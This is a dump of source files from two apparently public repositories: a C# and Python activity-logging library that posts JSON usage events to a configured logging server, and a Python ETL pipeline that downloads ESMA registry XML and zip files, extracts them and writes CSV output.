UserActivityMessage.Add(\"type\", \"USERACTION \");\n\n Dictionary<String, Object> parms = new Dictionary<string,object>();\n parms.Add(\"desc\", actionDescription);\n parms.Add(\"activity\", userActivity);\n parms.Add(\"wf_state\", (int)userWorkflowState);\n parms.Add(\"wf_version\", workflowCodingVersion);\n\n UserActivityMessage.Add(\"parms\", parms);\n UserActivityMessage.Add(\"metadata\", softwareMetadata);\n\n return convertToJSON(UserActivityMessage);\n }\n\n /// <summary>\n /// Log the Layout of a UI Element.\n /// </summary>\n /// <param name=\"ISOTimestamp\"></param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView moved in User_Dashboard\"</example></param>\n /// <param name=\"uiElementName\">The name of the UI component that has changed position or visibility.</param>\n /// <param name=\"visibility\"><code>true</code> if the element is currently visibile. <code>false</code> if the element is completely hidden.</param>\n /// <param name=\"leftBound\">The absolute position on screen, in pixels, of the leftmost boundary of the UI element.</param>\n /// <param name=\"rightBound\">The absolute position on screen, in pixels, of the rightmost boundary of the UI element.</param>\n /// <param name=\"topBound\">The absolute position on screen, in pixels of the top boundary of the UI element.</param>\n /// <param name=\"bottomBound\">The absolute position on screen, in pixels of the bottom boundary of the UI element.</param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity.</param>\n /// <remarks><see cref=\"registerActivityLogger\"/> MUST be called before calling this function. Use <code>logUILayout</code>\n /// to record any changes to the position or visibility of User Interface elements on screen.</remarks>\n /// <returns>A JSON log message.</returns>\n public String logUILayout(String ISOTimestamp, String actionDescription, String uiElementName, bool visibility, int leftBound, int rightBound, int topBound, int bottomBound, Dictionary<String, String> softwareMetadata = null)\n {\n Dictionary<String, object> recastMetaData = null;\n if (softwareMetadata != null)\n {\n recastMetaData = new Dictionary<string, object>();\n foreach (String key in softwareMetadata.Keys)\n {\n recastMetaData.Add(key, softwareMetadata[key]);\n }\n }\n\n return logUILayout<Object>(ISOTimestamp, actionDescription, uiElementName, visibility, leftBound, rightBound, topBound, bottomBound, recastMetaData);\n }\n\n /// <summary>\n /// Log the Layout of a UI Element, with optionally nested metadata.\n /// </summary>\n /// <param name=\"ISOTimestamp\"></param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView moved in User_Dashboard\"</example></param>\n /// <param name=\"uiElementName\">The name of the UI component that has changed position or visibility.</param>\n /// <param name=\"visibility\"><code>true</code> if the element is currently visibile. <code>false</code> if the element is completely hidden.</param>\n /// <param name=\"leftBound\">The absolute position on screen, in pixels, of the leftmost boundary of the UI element.</param>\n /// <param name=\"rightBound\">The absolute position on screen, in pixels, of the rightmost boundary of the UI element.</param>\n /// <param name=\"topBound\">The absolute position on screen, in pixels of the top boundary of the UI element.</param>\n /// <param name=\"bottomBound\">The absolute position on screen, in pixels of the bottom boundary of the UI element.</param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity. These can be nested.</param>\n /// <remarks><see cref=\"registerActivityLogger\"/> MUST be called before calling this function. Use <code>logUILayout</code>\n /// to record any changes to the position or visibility of User Interface elements on screen.</remarks>\n /// <returns>A JSON log message.</returns>\n public String logUILayout<T>(String ISOTimestamp, String actionDescription, String uiElementName, bool visibility, int leftBound, int rightBound, int topBound, int bottomBound, Dictionary<String, T> softwareMetadata = null)\n {\n Dictionary<string, object> UILayoutMessage = new Dictionary<string,object>();\n \n writeHeader(UILayoutMessage);\n\n UILayoutMessage.Add(\"timestamp\", ISOTimestamp);\n UILayoutMessage.Add(\"type\", \"UILAYOUT\");\n\n Dictionary<string, object> parms = new Dictionary<string,object>();\n parms.Add(\"desc\", actionDescription);\n parms.Add(\"visibility\", visibility);\n parms.Add(\"leftBound\", leftBound);\n parms.Add(\"rightBound\", rightBound);\n parms.Add(\"topBound\", topBound);\n parms.Add(\"bottomBound\", bottomBound);\n UILayoutMessage.Add(\"parms\", parms);\n\n UILayoutMessage.Add(\"metadata\", softwareMetadata);\n\n return convertToJSON(UILayoutMessage);\n }\n\n\n //=================END ACTIVITY LOGGING FUNCTIONS========================\n\n /*=========================INTERNAL FUNCTIONS============================\n * These functions are used internally by the Activity Logger helper \n * library to generate JSON log messages.\n */\n\n private void writeHeader(Dictionary<string,object> msg)\n {\n msg.Add(\"client\", clientHostname);\n msg.Add(\"sessionID\", sessionID);\n msg.Add(\"apiVersion\", apiVersion);\n msg.Add(\"impLanguage\", implementationLanguage);\n\n Dictionary<string, object> component = new Dictionary<string,object>();\n component.Add(\"name\", componentName);\n component.Add(\"version\", componentVersion);\n msg.Add(\"component\", component);\n }\n\n \n //Write the required API version structured data element\n private String convertToJSON(Dictionary<string, object> msg)\n {\n String json = \"{\";\n\n bool isFirstElement = true;\n foreach (String key in msg.Keys)\n {\n if (msg[key] != null)\n {\n if (!isFirstElement)\n {\n json += \", \";\n }\n else\n {\n isFirstElement = false;\n }\n\n json += \"\\\"\" + key + \"\\\":\";\n\n if (msg[key] is int || msg[key] is float)\n {\n json += msg[key];\n }\n else if (msg[key] is String)\n {\n json += \"\\\"\" + msg[key] + \"\\\"\";\n }\n else if (msg[key] is bool)\n {\n bool fieldVal = (bool)msg[key];\n if (fieldVal)\n {\n json += \"true\";\n }\n else\n {\n json += \"false\";\n }\n }\n else if (msg[key] is Dictionary<string, object>)\n {\n json += convertToJSON((Dictionary<string, object>)msg[key]);\n }\n else\n {\n throw new FormatException(\"Can only serialize numbers, strings, and Dictionary<string, object>s to JSON.\");\n }\n }\n }\n\n json += \"}\";\n return json;\n\n }\n\n //Write the required Activity structured data element\n //\tWrite the UI Layout structured data element\n //Write any metadata included by the software developer\n //Internal function to encode a single structured data element \n //=======================END INTERNAL FUNCTIONS==========================\n\n }\n}\n\n" }, { "alpha_fraction": 0.6995007395744324, "alphanum_fraction": 0.7104845643043518, "avg_line_length": 37.417606353759766, "blob_id": "6644e3be82c01e35aa7286a33644306d4b6ae13e", "content_id": "7dad41c4106f1945792332a647bb599847348004", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17025, "license_type": "permissive", "max_line_length": 136, "num_lines": 443, "path": "/python/ActivityLogger.py", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "import socket, Queue, threading, urllib2\nimport json\nfrom random import randint\nfrom datetime import datetime\n\nclass ActivityLogger:\n\t\"\"\"\n\n\t##########################\n\tPython Activity Logger\n\t##########################\n\tDraper Laboratory, June 2013\n\t----------------------------\n\n\t\n\tThis library is intended for integration into Python 2.7 software component which is implementing the Draper \n\tActivity Logging API. To send activity log messages using this libary, components must:\n\n\t\t1. Instantiate an ``ActivityLogger`` object\n\t\t2. Call ``registerActivityLogger(...)`` to pass in required networking \n\t\t and version information.\n\t\t3. Call one of the logging functions:\n\t\t\t* ``logSystemActivity(...)``\n\t\t\t* ``logUserActivity(...)``\n\t\t\t* ``logUILayout(...)``\n\t\n\tAn example use of this library is included below::\n\t\n\t\timport ActivityLogger\n\n\t\t# Instantiate the Activity Logger\n\t\tac = ActivityLogger.ActivityLogger()\n\n\t\t# Minimally register the logger (DISCOURAGED). In this case, we register our logger object to look for the \n\t\t# Draper logging server on port 1337 at 172.16.98.9. This is the real address of the Logging Server during \n\t\t# XDATA Summer Camp 2013. No other arguments are supplied, so the software component name will be logged as \n\t\t# unknownComponent, the component version will be unknown, the User Session ID will be a random integer, \n\t\t# and the host name of this machine will be its public-facing IP address.\n\n\t ac.registerActivityLogger(\"http://172.16.98.9:1337\")\n\n\t\t# Re-register the logger. In this case, we register our logger object to look for the Draper logging server on \n\t\t# port 1337 at 172.16.98.9.We specify that this software component is version 34.87 of the software component \n\t\t# named \"Python Test Component\", the User Session ID is \"AC34523452345\", and this machine is named\n\t\t# pythonTableServer.xdata.data-tactics-corp.net\n\t\t\n\t\tac.registerActivityLogger(\"http://172.16.98.9:1337\", \"Python Test Component\", \"34.87\", \"AC34523452345\", \n\t\t\t\"pythonTableServer.xdata.data-tactics-corp.net\")\n\n\t\t# Send a System Activity Message. In this case, we send a System Activity message with the action description \n\t\t# \"Pushed query results to GUI\"\n\n\t\tac.logSystemActivity(\"Pushed query results to GUI\")\n\n\t\t# Send a System Activity Message with optional metadata included. In this case, we send a System Activity\n\t\t# message with the action description \"Pushed query results to GUI\" and optional metadata with two key-value \n\t\t# pairs of:\n\t\t# \t'rowsReturned'=314\n\t\t# \t'queryTime'='422 ms\n'\n\t\tac.logSystemActivity(\"Pushed query results to GUI\", {\"rowsReturned\":314, \"queryTime\":\"422 ms\"})\n\n\t\t# Send a User Activity Message. In this case, we send a User Activity message with the action description \n\t\t# \"Filtered results using a Histogram view\", a developer-defined user action visualFilter_Histogram, and the \n\t\t# workflow constant WF_SEARCH, defined in the Draper Activity Logging API.\n\n\t\tac.logUserActivity(\"Filtered results using a Histogram view\" , \"visualFilter_Histogram\", ac.WF_SEARCH)\n\n\t\t# Send a UI Layout Message. In this case, we send a UI Layout message with action description of\"Expand Tree \n\t\t# Node\". The name of the UI element is \"Cluster_Browser_List\", visibility=True, meaning SearchWindow A is \n\t\t# currently visible. The left, right, top and bottom bounds of the UI element are 200px, 450px, 200px, and 500 \n\t\t# from the top right of the screen. \n\n\t\tac.logUILayout(\"Expand Tree Node\", \"Cluster_Browser_List\", True, 200, 450, 200, 500) \n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tThe fully-qualified address of the logging server that will collect messages dispatched by this library. During \n\t\tXDATA Summer Camp 2013, the logging server is ``http://172.16.98.9:1337``.\n\t\t\"\"\"\n\t\tself.activityLogServerURL = \"\"\n\n\t\t\"\"\"\n\t\tThe name of the computer or VM on which the software component using this library is runing. In the case of\n\t\ta server-side Python component, this should be the host name of the machine on which the Python service is\n\t\trunning. By default, this field will be populated with the IP address of the machine on which this module is \n\t\texecuted.\n\n\t\tIdeally, this hostname should describe a physical terminal or experimental setup as persistently as possible.\n\t\t\"\"\"\n\t\ttry:\n\t\t \tself.clientHostname = socket.gethostname()\n\t\t\tself.clientHostname = socket.gethostbyname(socket.gethostname())\n\t\texcept Exception:\n\t\t\tpass\n\n\t\t\"\"\"\n\t\tThe name of the software component or application sending log messages from this library. Defaults to \n\t\t``unknownComponent``\n\t\t\"\"\"\n\t\tself.componentName = \"unknownComponent\"\n\n\t\t\"\"\"\n\t\tThe version number of the software component or application specified in ``clientHostname`` that is sending log\n\t\tmessages from this library. Defaults to ``unknown``.\n\t\t\"\"\"\n\t\tself.componentVersion = \"unknown\"\n\n\t\t\"\"\"\n\t\tThe unique session ID used for communication between client and sever-side software components during use of \n\t\tthis component. Defaults to a random integer.\n\n\t\tIdeally, this session ID will identify log messages from all software components used to execute a unique user \n\t\tsession.\n\t\t\"\"\"\n\t\tself.sessionID = randint(1,10000)\n\n\n\t\t\"\"\"\n\t\tSet to ``True`` to echo log messages to the console, even if they are sent sucessfully to the Logging Server.\n\t\t\"\"\"\n\t\tself.echoLogsToConsole = False\n\n\t\t\"\"\"Set to ``True`` to disable System Activity log messages.\"\"\"\n\t\tself.muteSystemActivityLogging = False\n\n\t\t\"\"\"Set to ``True`` to disable User Activity log messages.\"\"\"\n\t\tself.muteUserActivityLogging = False\n\n\t\t\"\"\"Set to ``True`` to disable UI Layout log messages.\"\"\"\n\t\tself.muteUILayoutLogging = False\n\n\t\tself.logMessageQueue = Queue.Queue(0)\n\t\tself.httpTransmissionThread = None\n\n\t\tself.running = True;\n\n\t\"\"\"\n\t******************\n\tINTERNAL CONSTANTS\n\t******************\n\t\n\tThese constant define values associated with this specific version of this library, and should not be changed by the\n\timplementor.\n\t\"\"\"\n\n\t\"\"\"The version number of the Draper Activity Logging API implemented by this library.\"\"\"\n\tapiVersion = 2\n\n\t\"\"\"The workflow coding version used by this Activity Logging API.\"\"\"\n\tworkflowCodingVersion = 1\n\t\n\t\"\"\"\n\tWORKFLOW CODES\n\t\n\tThese constants specify the workflow codes defined in the Draper Activity Logging API version <apiVersion>. One of \n\tthese constants *must* be passed in the parameter ``userWorkflowState``\tin the function ``logUserActivity``. \n\t\"\"\"\n\tWF_OTHER\t \t= 0\n\tWF_PLAN\t \t\t= 1\n\tWF_SEARCH\t \t= 2\n\tWF_EXAMINE\t\t= 3\n\tWF_MARSHAL\t\t= 4\n\tWF_REASON\t \t= 5\n\tWF_COLLABORATE\t= 6\n\tWF_REPORT \t\t= 7\n\n\n\t\"\"\"\n\tThe domain for all structured data elements necessary to send IETF RCF 5424 compliant Syslog messages. 15038 is \n\tDraper Lab's IANA Private Enterprise Number, and should be used in all log messages sent with this API.\n\t\"\"\"\n\tstructuredDataDomain = 15038\n\n\t\"\"\"The language in which this helper library is implemented\"\"\"\n\timplementationLanguage = \"Python\"\n\n\n\t# /*======================== REGISTRATION ============================\n\t# * These variables are assigned by calling the \n\t# * <registerActivityLogger> function below. They are persistent until\n\t# * a new ActivityLogger object is instantiated, or until modification\n\t# * by the <registerActivityLogger> function. \n\t# */\n\n\tdef writeHead(self):\n msg = {}\n\n msg['timestamp'] = datetime.now().isoformat('T') + 'Z'\n msg['client'] = self.clientHostname;\n msg['component'] = {'name': self.componentName, 'version': self.componentVersion};\n msg['sessionID'] = self.sessionID;\n msg['impLanguage'] = self.implementationLanguage;\n msg['apiVersion'] = self.apiVersion\n\n return msg;\n\n\n\tdef registerActivityLogger(self, activityLogServerIN, componentNameIN=None, componentVersionIN=None, \n\t\tsessionIdIN=None, clientHostnameIN=None):\n\t\n\t\t\"\"\"Register this event logger. <registerActivityLogger> MUST be called before log messages can be sent with this\n\t\tlibrary. \n\n\t\tArgs:\n\t\t\tactivityLogServerIN (str): The address of the logging server. See documentation for ``activityLogServerURL``\n\t\t\tbelow. \n\n \tKwargs:\n\t\t\tcomponentNameIN (str): The name of the app or component using this library. See documentation for \n\t\t\t``componentName`` below. If not provided, defaults to the hostname of the web app that loaded this library.\n\n\t\t\tcomponentVersionIN (str): The version of this app or component. See documentation for ``componentVersion``\n\t\t\tbelow. If not provided, defaults to 'unknown'.\n\n\t\t\tsessionIdIN (str): A unique ID for the current user session. See documentation for ``sessionID`` below. If \n\t\t\tnot provided, defaults to a random integer.\n\n\t\t\tclientHostnameIN (str): The hostname or IP address of this machine or VM. See documentation for \n\t\t\t``clientHostname`` below. If not provided, defaults to the public IP address of this computer.\n \t\"\"\"\n\t\tself.activityLogServerURL = activityLogServerIN\n\n\t\tif componentNameIN is not None:\n\t\t\t self.componentName= componentNameIN\n\t\t\n\n\t\tif componentVersionIN is not None:\n\t\t\tself.componentVersion = componentVersionIN\n\t\t\n\t\tif sessionIdIN is not None:\n\t\t\t self.sessionID = sessionIdIN\n\n\t\tif clientHostnameIN is not None:\n\t\t self.clientHostname = clientHostnameIN\n\n\t#========================END REGISTRATION==========================\n\n\t\"\"\"\n\tDEVELOPMENT FUNCTIONALITY\n\t=========================\n\tThe properties and function in this section allow developers to echo log messages to the console, and disable the \n\tgeneration and transmission of logging messages by this library. \n\t\"\"\"\n\t\n\tdef muteAllLogging(self):\n\t\t\"\"\"Disable all log messages\"\"\"\n\t\tself.muteSystemActivityLogging = True\n\t\tself.muteUserActivityLogging = True\n\t\tself.muteUILayoutLogging = True\n\n\tdef unmuteAllLogging(self):\n\t\t\"\"\"Enable all log messages\"\"\"\n\t\tself.muteSystemActivityLogging = False\n\t\tself.muteUserActivityLogging = False\n\t\tself.muteUILayoutLogging = False\n\t\n\t#=================END DEVELOPMENT FUNCTIONALITY====================\n\n\t\n\t# /*==================ACTIVITY LOGGING FUNCTIONS======================\n\t# * The 3 functions in this section are used to send Activity Log\n\t# * Mesages to an Activity Logging Server. Seperate functions are used\n\t# * to log System Activity, User Activity, and UI Layout Events. See \n\t# * the Activity Logging API by Draper Laboratory for more details \n\t# * about the use of these messages.\n\t# */\n\t\n\tdef logSystemActivity(self, actionDescription, softwareMetadata = {}):\n\t\t\"\"\"Log a System Activity. \n\n\t\tArgs:\n\t\t\tactionDescription (str): A string describing the System Activity performed by the component. Example: \n\t\t \t\t\"BankAccountTableView component refreshed datasource\"\n\t\tKwargs: \n\t\t\tsoftwareMetadata: (dict): Any key/value pairs that will clarify or paramterize this system activity. \n\t\t\tExample: \n\t\t\t\t{'rowsAdded':'3', 'dataSource':'CheckingAccounts'}\n\n\t\t``registerActivityLogger`` **must** be called before calling this function. Use ``logSystemActivity`` to log \n\t\tsoftware actions that are not explicitly invoked by the user. For example, if a software component refreshes a \n\t\tdata store after a pre-determined time span, the refresh event should be logged as a system activity. However, \n\t\tif the datastore was refreshed in response to a user clicking a Reshresh UI element, that activity should NOT be\n\t\tlogged as a System Activity, but rather as a User Activity, with the method ``logUserActivity``.\n\t\t\"\"\"\n\t\t# encodedSystemActivityMessage = \"\"\n\t\tif not(self.muteSystemActivityLogging):\n\t\t\n\t\t\tmsg = self.writeHead()\n\t\t\tmsg['type'] = \"SYSACTION\";\n\t\t\tmsg['parms'] = {\n\t\t\t 'desc': actionDescription\n\t\t\t}\n\t\t\tmsg['meta'] = softwareMetadata;\n\t\t\tself.sendHttpMsg(msg);\n\t\t\t\n\n\t\t\t# self.sendHttpMsg(encodedSystemActivityMessage)\n\t\t\n\n\t\treturn msg\n\t\n\n\n\tdef logUserActivity(self, actionDescription, userActivity, userWorkflowState, softwareMetadata={}):\n\t\t\"\"\"\n\t\tLog a User Activity. \n \n \tArgs:\n \t\tactionDescription (str): A string describing the System Activity performed by the component. Example: \n \t\t\t\"BankAccountTableView component refreshed datastore.\"\n \t\t\n \t\tuserActivity (str): A key word defined by each software component or application indicating which \n \t\tsoftware-centric function is is most likely indicated by the this user activity. See the Activity Logging \n \t\tAPI for a standard set of user activity key words. \n\n\t\t\tuserWorkflowState (int): This value must be one of the Workflow Codes defined in this library. See the \n\t\t\tActivity Logging API for definitions of each workflow code. Example:\n\t\t\t\tac = new ActivityLogger()\n\t\t\t\t...\n\t\t\t\tuserWorkflowState = ac.WF_SEARCH\n\t\t\n\t\tKwargs\n\t\t\tsoftwareMetadata (dict) Optional. Any key/value pairs that will clarify or paramterize this system activity.\n\t\t\tExample: \n\t\t\t\t{'rowsAdded':'3', 'dataSource':'CheckingAccounts'}\n \n \t``registerActivityLogger`` MUST be called before calling this function. Use ``logUserActivity`` to log actions \n \tinitiated by an explicit user action. For example, if a software component refreshes a data store when the user \n\t clicks a Reshresh UI element, that activity should be logged as a User Activity. However, if the datastore was \n\t refreshed automatically after a certain time span, that activity should NOT be logged as a User Activity, but \n\t rather as a System Activity.\n\t \"\"\"\n\n\t\tencodedSystemActivityMessage = \"\"\n\n\t\tif not(self.muteUserActivityLogging):\n\t\t\t\n\t\t\tmsg = self.writeHead()\n\t\t\tmsg['type'] = \"USERACTION\";\n\t\t\tmsg['parms'] = {\n\t\t\t 'desc': actionDescription,\n\t\t\t 'activity': userActivity,\n\t\t\t 'wf_state': userWorkflowState,\n\t\t\t\t'wfCodeVersion': self.workflowCodingVersion\n\t\t\t}\n\t\t\tmsg['meta'] = softwareMetadata;\n\t\t\tself.sendHttpMsg(msg);\t\t\t\n\t\t\n\t\treturn msg\n\t\n\n\tdef logUILayout(self, actionDescription, uiElementName, visibility, leftBound, rightBound, topBound, bottomBound, softwareMetadata={}):\n\t\t\"\"\"\n\t\tLog the Layout of a UI Element. \n\n\t\tArgs:\n\t\t\tactionDescription (str): A string describing the System Activity performed by the component. Example: \n\t\t\t\t\"BankAccountTableView moved in User_Dashboard\"\n\n\t\t\tuiElementName (str): The name of the UI component that has changed position or visibility.\n\n\t\t\tvisibility (bool): ``True`` if the element is currently visibile. False if the element is completely hidden. \n\n\t\t\tleftBound (int): The absolute position on screen, in pixels, of the leftmost boundary of the UI element. \n\t\t\t\n\t\t\trightBound (int): The absolute position on screen, in pixels, of the rightmost boundary of the UI element. \n\t\t\t\n\t\t\ttopBound (int): The absolute position on screen, in pixels of the top boundary of the UI element. \n\t\t\t\n\t\t\tbottomBound (int): The absolute position on screen, in pixels of the bottom boundary of the UI element. \n\t\t\t\n\t\tKwargs: \n\n\t\t\tsoftwareMetadata (dict): Any key/value pairs that will clarify or paramterize this system activity. Example:\n\t\t\t\t{'currentDashboardRow':'3', 'movementMode':'Snap_To_Grid'}\n\n\t\t``registerActivityLogger`` MUST be called before calling this function. Use ``logUILayout`` to record any \n\t\tchanges to the position or visibility of User Interface elements on screen.\n\t\t\"\"\"\n\t\t# encodedSystemActivityMessage = \"\"\n\n\t\tif not(self.muteUILayoutLogging):\n\n\t\t\tmsg = self.writeHead()\n\t\t\tmsg['type'] = \"UILAYOUT\";\n\t\t\tmsg['parms'] = {\n\t\t\t 'visibility': visibility,\n\t\t\t 'leftBound': leftBound,\n\t\t\t 'rightBound': rightBound,\n\t\t\t 'topBound': topBound,\n\t\t\t 'bottomBound': bottomBound\n\t\t\t}\n\t\t\tmsg['meta'] = softwareMetadata;\n\t\t\tself.sendHttpMsg(msg);\t\t\t\n\t\t\n\t\treturn msg\n\t\n\n\t# //=================END ACTIVITY LOGGING FUNCTIONS========================\n\n\t# /*=========================INTERNAL FUNCTIONS============================\n\t# * These functions are used internally by the Activity Logger helper \n\t# * library to generate RCF5424 Syslog messages, and transmit them via \n\t# * HTTP POST messages to an Activity Logging server. \n\t# */\n\n\n\n\tdef httpTransmissionLoop(self):\n\t\t\n\t\t# activityLoggerConnection = httplib.HTTPConnection(self.activityLogServerURL)\n\n\t\twhile self.running:\n\t\t\tnextLogMessage = self.logMessageQueue.get(block=True)\n\n\t\t\ttry:\n\t\t\t\tactivityLogServerResponse = urllib2.urlopen(self.activityLogServerURL, nextLogMessage)\n\n\t\t\t\tactivityLogServerResponse.read()\t\t\n\t\t\t\tif activityLogServerResponse.getcode() != 200:\n\t\t\t\t\tprint \"Log message not sent. Bad response from Logging Server.\"\n\t\t\t\t\tprint \"Server address: \" + self.activityLogServerURL\n\t\t\t\t\tprint \"Response code: \" + str(activityLogServerResponse.getcode())\n\t\t\t\t\tprint \"Log Message:\"\n\t\t\t\t\tprint nextLogMessage\n\t\t\texcept Exception as err:\n\t\t\t\tprint \"Error connecting to Draper Activity Logging Server. Error is:\"\n\t\t\t\tprint err\n\t\t\t\tprint \"Server address: \" + self.activityLogServerURL\n\t\t\t\tprint \"Log Message:\"\n\t\t\t\tprint nextLogMessage\n\n\n\tdef sendHttpMsg(self, encodedLogMessage):\n\t\tif self.httpTransmissionThread is None:\n\t\t\tself.httpTransmissionThread = threading.Thread(group=None, target=self.httpTransmissionLoop, name=None, args=(), kwargs={})\n\t\t\tself.httpTransmissionThread.start()\n\t\tself.logMessageQueue.put(json.dumps(encodedLogMessage))\t\n\n\tdef __del__(self):\n\t\tself.running = False\n\t#=======================END INTERNAL FUNCTIONS==========================\n\t\n\t\n\n\n" }, { "alpha_fraction": 0.732758641242981, "alphanum_fraction": 0.8017241358757019, "avg_line_length": 22.200000762939453, "blob_id": "7d65cb66d8cef8d5ef31635cf753e8385d9d1091", "content_id": "382d888c021b5d0982e6f63cfc916018587d5859", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 116, "license_type": "permissive", "max_line_length": 54, "num_lines": 5, "path": "/javascript/README.md", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "Use draper.activity_logger.js\n\nActivityLogger.js will remain while transitioning over\n\nupdate: 2014-01-24 by David Reed\n" } ]
8
sunilkrdeep/SteelEyeProject
https://github.com/sunilkrdeep/SteelEyeProject
aa24a3a70137d6ba758da2b968b4ee97ca25206e
02ad164957ea2175a2d47c305facdbfeadc35959
2f5e2ab12f11fee054201cd7fdcc00c351acfec1
refs/heads/master
2023-03-19T09:33:37.666280
2021-03-22T05:22:08
2021-03-22T05:22:08
350,032,272
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6337325572967529, "alphanum_fraction": 0.6357285380363464, "avg_line_length": 35.436363220214844, "blob_id": "a6596e4baefe0307ca06203eac0d5cf0da3c79cd", "content_id": "39471b5b279afb6963ebe1068fbfa95cbf4837fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2004, "license_type": "no_license", "max_line_length": 96, "num_lines": 55, "path": "/xml_data_processing/mainFileProcessing.py", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "import os\nimport time\nimport json\n\nfrom xml_data_processing.downloadZipfiles import remove_old_files, \\\n esma_registers_download, downloadZipfiles, \\\n unzipdownload\nfrom xml_data_processing.file_logger import file_logger\nfrom xml_data_processing.xmlfileProcessingService import xmlfileprocessing, saveDictiornarytoCSV\n\n\ndef main():\n \"\"\"\"\n This is main function which calls all Dataline function and execute functions in sequence.\n \"\"\"\n with open(\"application.json\", encoding='utf-8') as json_config:\n config_data = json.load(json_config)\n logdir = config_data['logdir']\n logfile = config_data['logfile']\n url = config_data['url']\n zippath = config_data['zippath']\n xmlfile = config_data['xmlfile']\n dltinspath = config_data['dltinspath']\n csvDatafile = config_data['csvDatafile']\n dltinsDir = config_data['dltinsDir']\n\n logs = file_logger(logdir, logfile)\n logs.logger().info(f'Configuration Inforamtion : {config_data}')\n remove_old_files(zippath, dltinspath, xmlfile, logs)\n time.sleep(5)\n esma_registers_download(url, xmlfile, logs)\n downloadZipfiles(xmlfile, zippath, logs)\n unzipdownload(zippath, dltinspath, logs)\n time.sleep(2.4)\n\n headerFlag = True\n\n for filename in os.listdir(dltinsDir):\n if filename.endswith(\".xml\"):\n # print(filename)\n logs.logger().info(f'Data Processing File : {filename}')\n if os.path.isdir(dltinsDir):\n try:\n dltinsfile = dltinsDir + filename\n logs.logger().info(f'Data Processing File : {dltinsfile}')\n dict_list = xmlfileprocessing(dltinsfile, logs)\n saveDictiornarytoCSV(dict_list, csvDatafile, headerFlag, logs)\n headerFlag = False\n\n except OSError as e:\n logs.logger().exception(f'{e.strerror} ERROR OCCURED.', exc_info=True)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7994186282157898, "alphanum_fraction": 0.7994186282157898, "avg_line_length": 170.5, "blob_id": "a15b943ba8d2b9a447545a0e0a93e0105618a51c", "content_id": "0317ff45a758294fc2fb5633a179ab2e66d61d56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 344, "license_type": "no_license", "max_line_length": 324, "num_lines": 2, "path": "/README.md", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "# SteelEyeProject\nThis DataPipe line (ETL) project is download a XML file from website and extract URL of zipped data files. It downloads all zipped data files from ULR location and extract these zipped file and put XML data files to different directory. The XML data files process and extract required information which put in CSV file. \n" }, { "alpha_fraction": 0.5775700807571411, "alphanum_fraction": 0.5775700807571411, "avg_line_length": 28.72222137451172, "blob_id": "2789b91de84631c39eb7f58b73409244504d3096", "content_id": "f703d789ecdda7ec09f8b40576c3c5ec0df842d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 535, "license_type": "no_license", "max_line_length": 79, "num_lines": 18, "path": "/xml_data_processing/file_logger.py", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "import logging\n\n\nclass file_logger():\n \"\"\"\"\n This is logger class which logs all event in log file.\n \"\"\"\n def __init__(self, logdir, logfile):\n self.logdir = logdir\n self.logfile = logfile\n\n def logger(self):\n logs = self.logdir + self.logfile\n logging.basicConfig(filename=logs, format='%(asctime)s %(message)s',\n datefmt='%m-%d-%Y %I:%M:%S %p', level=logging.INFO)\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n return logger\n" }, { "alpha_fraction": 0.5559653043746948, "alphanum_fraction": 0.5563991069793701, "avg_line_length": 37.09917449951172, "blob_id": "a5a88bdf76163d3b1cfc5ce1c190f2c0c3d9715a", "content_id": "ec9c3555652a6350135f2259f6fd1e16e7e47102", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4610, "license_type": "no_license", "max_line_length": 100, "num_lines": 121, "path": "/xml_data_processing/downloadZipfiles.py", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "import glob\nimport sys\nimport requests\nimport xml.etree.ElementTree as ET\nimport os, zipfile\n\n\ndef remove_old_files(zippath, dltinspath, xmlfile, logs):\n \"\"\"\"\n This function deletes all old xml, zip files.\n \"\"\"\n zipfiles = glob.glob(zippath + '*.*')\n dltinsfiles = glob.glob(dltinspath + '\\\\*.xml')\n logs.logger().info(f'Starting function : {remove_old_files.__name__} .')\n try:\n os.remove(xmlfile)\n logs.logger().info(f'{xmlfile} : old xml files is removed successfully.')\n\n except OSError as e:\n logs.logger().error(f'{xmlfile} have error {e.strerror}.')\n except:\n print(sys.exc_info()[0], \"occurred.\")\n logs.logger().error(f'{sys.exc_info()[0]} OCCURED.')\n\n for zf in zipfiles:\n try:\n os.remove(zf)\n logs.logger().info(f'{zf} : zipped file is removed successfully.')\n except OSError as e:\n logs.logger().error(f'{zf} have error {e.strerror}.')\n\n for df in dltinsfiles:\n try:\n os.remove(df)\n logs.logger().info(f'{df} : xmldata file is removed successfully.')\n except OSError as e:\n logs.logger().error(f'{df} have error {e.strerror}.')\n\n\ndef esma_registers_download(url, xmlfile, logs):\n \"\"\"\"\n This function download first xml file which has all zip files urls.\n It creates http urls to downlaod to zip files.\n \"\"\"\n logs.logger().info(f'Starting function : {remove_old_files.__name__} .')\n try:\n response = requests.get(url)\n logs.logger().info(f'successfully connected : {url}')\n\n except:\n logs.logger().exception(f'failed to connect url : {url} ', exc_info=True)\n\n try:\n with open(xmlfile, 'wb') as file:\n file.write(response.content)\n logs.logger().info(f'{xmlfile} is downloaded successfully.')\n except:\n 